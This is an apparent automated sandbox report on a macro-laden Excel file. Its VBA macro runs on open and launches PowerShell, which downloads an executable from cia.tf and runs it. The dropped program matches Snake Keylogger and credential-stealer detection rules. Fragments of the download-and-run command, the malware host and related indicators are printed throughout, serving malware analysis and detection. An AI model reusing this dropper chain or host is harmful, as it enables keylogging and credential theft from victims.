Source: global traffic HTTP traffic detected:
    GET /2ed7362e959d42385d4e6d231a6840dd.exe HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.1; en-US) WindowsPowerShell/5.1.14409.1005
    Host: cia.tf
    Connection: Keep-Alive
Source: unknown HTTPS traffic detected: 172.67.129.178:443 -> 192.168.2.22:49161 version: TLS 1.0
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\51AE0962.png
Source: powershell.exe, 00000002.00000002.384599695.000000001C446000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: global traffic DNS traffic detected: DNS query: cia.tf
Source: powershell.exe, 00000002.00000002.377877321.0000000003F74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.377877321.0000000003F70000.00000004.00000800.00020000.00000000.sdmp, svcost.exe.5.dr String found in binary or memory: http://cert.ssl.com/SSL.com-timeStamping-I-RSA-R1.cer0Q
Source: powershell.exe, 00000002.00000002.377877321.0000000003F74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.377877321.0000000003F70000.00000004.00000800.00020000.00000000.sdmp, svcost.exe.5.dr String found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0
Source: tmp667.exe, 00000005.00000002.450858713.0000000003691000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.446711663.00000000027EC000.00000004.00000800.00020000.00000000.sdmp, svcost.exe, 00000008.00000002.477050261.000000000349A000.00000004.00000800.00020000.00000000.sdmp, svcost.exe, 00000008.00000002.474407108.000000000256D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/q
Source: powershell.exe, 00000002.00000002.377877321.0000000003F47000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cia.tf
Source: powershell.exe, 00000002.00000002.384599695.000000001C47E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 00000002.00000002.384599695.000000001C446000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.383828170.000000001A857000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: powershell.exe, 00000002.00000002.384599695.000000001C446000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.383828170.000000001A857000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: powershell.exe, 00000002.00000002.384599695.000000001C446000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: powershell.exe, 00000002.00000002.384599695.000000001C47A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000002.00000002.384599695.000000001C446000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: powershell.exe, 00000002.00000002.384599695.000000001C446000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: powershell.exe, 00000002.00000002.377877321.0000000003F74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.377877321.0000000003F70000.00000004.00000800.00020000.00000000.sdmp, svcost.exe.5.dr String found in binary or memory: http://crls.ssl.com/SSL.com-timeStamping-I-RSA-R1.crl0
Source: powershell.exe, 00000002.00000002.377877321.0000000003F74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.377877321.0000000003F70000.00000004.00000800.00020000.00000000.sdmp, svcost.exe.5.dr String found in binary or memory: http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0
Source: powershell.exe, 00000002.00000002.377877321.0000000003F74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.377877321.0000000003F70000.00000004.00000800.00020000.00000000.sdmp, svcost.exe.5.dr String found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0
Source: powershell.exe, 00000002.00000002.377877321.0000000003F74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.377877321.0000000003F70000.00000004.00000800.00020000.00000000.sdmp, svcost.exe.5.dr String found in binary or memory: http://crls.ssl.com/ssl.com-rsa-RootCA.crl0
Source: powershell.exe, 00000002.00000002.377877321.00000000039FA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://go.micros
Source: tmp667.exe, 00000005.00000002.446119875.000000000053F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://go.microso
Source: powershell.exe, 00000002.00000002.377877321.000000000259B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.383414750.00000000123C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.384599695.000000001C446000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: powershell.exe, 00000002.00000002.384599695.000000001C446000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0%
Source: powershell.exe, 00000002.00000002.384599695.000000001C446000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0-
Source: powershell.exe, 00000002.00000002.384599695.000000001C446000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0/
Source: powershell.exe, 00000002.00000002.383828170.000000001A857000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com05
Source: powershell.exe, 00000002.00000002.384599695.000000001C446000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.entrust.net03
Source: powershell.exe, 00000002.00000002.384599695.000000001C446000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.383828170.000000001A857000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.entrust.net0D
Source: powershell.exe, 00000002.00000002.377877321.0000000003F74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.377877321.0000000003F70000.00000004.00000800.00020000.00000000.sdmp, svcost.exe.5.dr String found in binary or memory: http://ocsps.ssl.com0
Source: powershell.exe, 00000002.00000002.377877321.0000000003F74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.377877321.0000000003F70000.00000004.00000800.00020000.00000000.sdmp, svcost.exe.5.dr String found in binary or memory: http://ocsps.ssl.com0?
Source: powershell.exe, 00000002.00000002.377877321.0000000003F74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.377877321.0000000003F70000.00000004.00000800.00020000.00000000.sdmp, svcost.exe.5.dr String found in binary or memory: http://ocsps.ssl.com0_
Source: powershell.exe, 00000002.00000002.377877321.0000000002391000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.446711663.00000000026F2000.00000004.00000800.00020000.00000000.sdmp, svcost.exe, 00000008.00000002.474407108.00000000024EB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.384599695.000000001C446000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.383828170.000000001A857000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: powershell.exe, 00000002.00000002.384599695.000000001C446000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: powershell.exe, 00000002.00000002.377877321.0000000003F74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.377877321.0000000003F70000.00000004.00000800.00020000.00000000.sdmp, svcost.exe.5.dr String found in binary or memory: http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0
Source: powershell.exe, 00000002.00000002.377877321.0000000003F74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.377877321.0000000003F70000.00000004.00000800.00020000.00000000.sdmp, svcost.exe.5.dr String found in binary or memory: http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt0
Source: powershell.exe, 00000002.00000002.377877321.0000000003F2F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cia.tf
Source: powershell.exe, 00000002.00000002.377877321.0000000004152000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.377877321.0000000003F2F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe
Source: powershell.exe, 00000002.00000002.377790534.00000000004AE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.384599695.000000001C4B5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe-OutFile$TempFile;Start-Process$TempFile;
Source: powershell.exe, 00000002.00000002.377772524.00000000003D4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe-OutFile$TempFile;Start-Process$TempFile;:
Source: powershell.exe, 00000002.00000002.377761940.00000000002C6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe-OutFile$TempFile;Start-Process$TempFile;J
Source: powershell.exe, 00000002.00000002.383828170.000000001A815000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe-OutFile$TempFile;Start-Process$TempFile;N
Source: powershell.exe, 00000002.00000002.384433088.000000001B146000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe-OutFile$TempFile;Start-Process$TempFile;t
Source: vbaProject.bin String found in binary or memory: https://cia.tf/2ed7362e959d42385d4e6d231a6840ddB.
Source: powershell.exe, 00000002.00000002.383414750.00000000123C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.383414750.00000000123C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.383414750.00000000123C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: tmp667.exe, 00000005.00000002.450858713.00000000036D6000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.450858713.000000000370D000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.452199848.0000000004C10000.00000004.08000000.00040000.00000000.sdmp, svcost.exe, 00000008.00000002.474407108.0000000002376000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: tmp667.exe, 00000005.00000002.450858713.00000000036D6000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.450858713.000000000370D000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.452199848.0000000004C10000.00000004.08000000.00040000.00000000.sdmp, svcost.exe, 00000008.00000002.474407108.0000000002376000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: tmp667.exe, 00000005.00000002.450858713.00000000036D6000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.450858713.000000000370D000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.452199848.0000000004C10000.00000004.08000000.00040000.00000000.sdmp, svcost.exe, 00000008.00000002.474407108.0000000002376000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: powershell.exe, 00000002.00000002.377877321.000000000259B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.383414750.00000000123C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: tmp667.exe, 00000005.00000002.450858713.0000000003691000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.446711663.00000000027EC000.00000004.00000800.00020000.00000000.sdmp, svcost.exe, 00000008.00000002.477050261.000000000349A000.00000004.00000800.00020000.00000000.sdmp, svcost.exe, 00000008.00000002.474407108.000000000256D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: powershell.exe, 00000002.00000002.384599695.000000001C446000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.383828170.000000001A857000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://secure.comodo.com/CPS0
Source: tmp667.exe, 00000005.00000002.450858713.00000000036D6000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.450858713.000000000370D000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.452199848.0000000004C10000.00000004.08000000.00040000.00000000.sdmp, svcost.exe, 00000008.00000002.474407108.0000000002376000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: svcost.exe, 00000008.00000002.474407108.0000000002376000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: tmp667.exe, 00000005.00000002.450858713.00000000036D6000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.450858713.000000000370D000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.452199848.0000000004C10000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: powershell.exe, 00000002.00000002.377877321.0000000003F74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.377877321.0000000003F70000.00000004.00000800.00020000.00000000.sdmp, svcost.exe.5.dr String found in binary or memory: https://www.ssl.com/repository0
Source: unknown Network traffic detected: HTTP traffic on port 49161 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49161

System Summary

Source: 5.2.tmp667.exe.3695570.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 5.2.tmp667.exe.3695570.2.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 5.2.tmp667.exe.3695570.2.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 5.2.tmp667.exe.3695570.2.unpack, type: UNPACKEDPE Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 5.2.tmp667.exe.3695570.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 5.2.tmp667.exe.3695570.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 5.2.tmp667.exe.3695570.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 5.2.tmp667.exe.3695570.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000005.00000002.450858713.0000000003691000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000005.00000002.450858713.0000000003691000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000008.00000002.477050261.000000000349A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000008.00000002.477050261.000000000349A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000005.00000002.446711663.00000000027EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000008.00000002.474407108.000000000256D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: tmp667.exe PID: 3808, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: tmp667.exe PID: 3808, type: MEMORYSTR Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: svcost.exe PID: 3996, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: svcost.exe PID: 3996, type: MEMORYSTR Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: DGTCkacbSz.xlsx OLE, VBA macro line: Set Hthql = CreateObject("WScript.Shell")
Source: 79E20000.0.dr OLE, VBA macro line: Set Hthql = CreateObject("WScript.Shell")
Source: DGTCkacbSz.xlsx Stream path 'VBA/ThisWorkbook' : found hex strings
Source: 79E20000.0.dr Stream path 'VBA/ThisWorkbook' : found hex strings
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe File dump: svcost.exe.5.dr 262244634
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\tmp667.exe
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgID
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe Memory allocated: 770B0000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\svcost.exe Memory allocated: 770B0000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\svcost.exe Code function: 8_2_00C4D4F0 8_2_00C4D4F0
Source: C:\Users\user\AppData\Roaming\svcost.exe Code function: 8_2_00C457C8 8_2_00C457C8
Source: C:\Users\user\AppData\Roaming\svcost.exe Code function: 8_2_00C57318 8_2_00C57318
Source: C:\Users\user\AppData\Roaming\svcost.exe Code function: 8_2_00C5CC20 8_2_00C5CC20
Source: C:\Users\user\AppData\Roaming\svcost.exe Code function: 8_2_00C5CC1E 8_2_00C5CC1E
Source: C:\Users\user\AppData\Roaming\svcost.exe Code function: 8_2_00C5ED20 8_2_00C5ED20
Source: C:\Users\user\AppData\Roaming\svcost.exe Code function: 8_2_00C5ED30 8_2_00C5ED30
Source: C:\Users\user\AppData\Roaming\svcost.exe Code function: 8_2_0432C020 8_2_0432C020
Source: C:\Users\user\AppData\Roaming\svcost.exe Code function: 8_2_04328D3A 8_2_04328D3A
Source: C:\Users\user\AppData\Roaming\svcost.exe Code function: 8_2_04328D48 8_2_04328D48
Source: C:\Users\user\AppData\Roaming\svcost.exe Code function: 8_2_04320040 8_2_04320040
Source: C:\Users\user\AppData\Roaming\svcost.exe Code function: 8_2_043278E0 8_2_043278E0
Source: C:\Users\user\AppData\Roaming\svcost.exe Code function: 8_2_0432D219 8_2_0432D219
Source: C:\Users\user\AppData\Roaming\svcost.exe Code function: 8_2_0432C347 8_2_0432C347
Source: C:\Users\user\AppData\Roaming\svcost.exe Code function: 8_2_04B70040 8_2_04B70040
Source: C:\Users\user\AppData\Roaming\svcost.exe Code function: 8_2_05400040 8_2_05400040
Source: C:\Users\user\AppData\Roaming\svcost.exe Code function: 8_2_05400006 8_2_05400006
Source: C:\Users\user\AppData\Roaming\svcost.exe Code function: 8_2_0541E350 8_2_0541E350
Source: C:\Users\user\AppData\Roaming\svcost.exe Code function: 8_2_0541DEF8 8_2_0541DEF8
Source: DGTCkacbSz.xlsx OLE, VBA macro line: Private Sub Workbook_Open()
Source: 79E20000.0.dr OLE, VBA macro line: Private Sub Workbook_Open()
Source: DGTCkacbSz.xlsx OLE indicator, VBA macros: true
Source: 79E20000.0.dr OLE indicator, VBA macros: true
Source: 79E20000.0.dr Stream path 'VBA/__SRP_0' : https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -Out*File $TempFile; St*art-Proce*ss $TempFile;,^WScript.ShellQa1"hExecF
Source: 5.2.tmp667.exe.3695570.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.tmp667.exe.3695570.2.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.tmp667.exe.3695570.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 5.2.tmp667.exe.3695570.2.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 5.2.tmp667.exe.3695570.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.tmp667.exe.3695570.2.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.tmp667.exe.3695570.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 5.2.tmp667.exe.3695570.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000005.00000002.450858713.0000000003691000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000005.00000002.450858713.0000000003691000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000008.00000002.477050261.000000000349A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000008.00000002.477050261.000000000349A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000005.00000002.446711663.00000000027EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000008.00000002.474407108.000000000256D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: tmp667.exe PID: 3808, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: tmp667.exe PID: 3808, type: MEMORYSTR Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: svcost.exe PID: 3996, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: svcost.exe PID: 3996, type: MEMORYSTR Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: tmp667.exe.2.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: svcost.exe.5.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 5.2.tmp667.exe.3695570.2.raw.unpack, --.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.tmp667.exe.3695570.2.raw.unpack, --.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.tmp667.exe.3695570.2.raw.unpack, --.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.tmp667.exe.3695570.2.raw.unpack, --.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.tmp667.exe.47a0000.7.raw.unpack, ITaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 5.2.tmp667.exe.47a0000.7.raw.unpack, TaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 5.2.tmp667.exe.47a0000.7.raw.unpack, Task.cs Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 5.2.tmp667.exe.47a0000.7.raw.unpack, TaskService.cs Task registration methods: 'CreateFromToken'
Source: 5.2.tmp667.exe.37cb830.3.raw.unpack, ITaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 5.2.tmp667.exe.37cb830.3.raw.unpack, TaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 5.2.tmp667.exe.37cb830.3.raw.unpack, User.cs Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 5.2.tmp667.exe.47a0000.7.raw.unpack, TaskPrincipal.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 5.2.tmp667.exe.37cb830.3.raw.unpack, TaskFolder.cs Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 5.2.tmp667.exe.37cb830.3.raw.unpack, TaskPrincipal.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 5.2.tmp667.exe.47a0000.7.raw.unpack, User.cs Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 5.2.tmp667.exe.47a0000.7.raw.unpack, TaskSecurity.cs Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 5.2.tmp667.exe.47a0000.7.raw.unpack, TaskSecurity.cs Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 5.2.tmp667.exe.47a0000.7.raw.unpack, TaskFolder.cs Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 5.2.tmp667.exe.37cb830.3.raw.unpack, TaskSecurity.cs Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 5.2.tmp667.exe.37cb830.3.raw.unpack, TaskSecurity.cs Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
